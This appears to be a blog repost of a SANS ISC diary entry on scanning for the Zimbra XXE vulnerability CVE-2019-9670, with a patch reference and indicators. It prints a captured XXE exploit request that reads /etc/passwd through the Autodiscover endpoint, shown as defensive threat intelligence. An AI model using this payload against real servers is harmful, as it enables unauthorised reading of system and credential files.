Malware Devil

Loading...

Saturday, June 26, 2021

CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th)

This XML External Entity injection (XXE) vulnerability disclosed in March 2019 is still actively scanned for a vulnerable mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. This exploit attempts to read the Zimbra configuration file that contains an LDAP password for the zimbra account.

Sample Log

20210625-144918: 192.168.25.9:443-45.146.165.123:41062 data
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: XX.XX.28.221:443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd”>]>
<Autodiscover xmlns=”http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a”>
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>’

Indicators (AS Name: HOSTWAY-AS, SELECTEL)

Information on the patch is available here [3].

[1] https://nvd.nist.gov/vuln/detail/CVE-2019-9670
[2] https://bugzilla.zimbra.com/show_bug.cgi?id=109129
[3] https://wiki.zimbra.com/wiki/Zimbra_Releases/8.7.11/P10
[4] https://programmersought.com/article/89298322178/
[5] https://www.shodan.io/search?query=zimbra
[6] https://isc.sans.edu/forums/diary/Is+XXE+the+new+SQLi/17375
[7] https://isc.sans.edu/forums/diary/Blindly+confirming+XXE/19257

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th) appeared first on Malware Devil.



https://malwaredevil.com/2021/06/26/cve-2019-9670-zimbra-collaboration-suite-xxe-vulnerability-sat-jun-26th/?utm_source=rss&utm_medium=rss&utm_campaign=cve-2019-9670-zimbra-collaboration-suite-xxe-vulnerability-sat-jun-26th
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...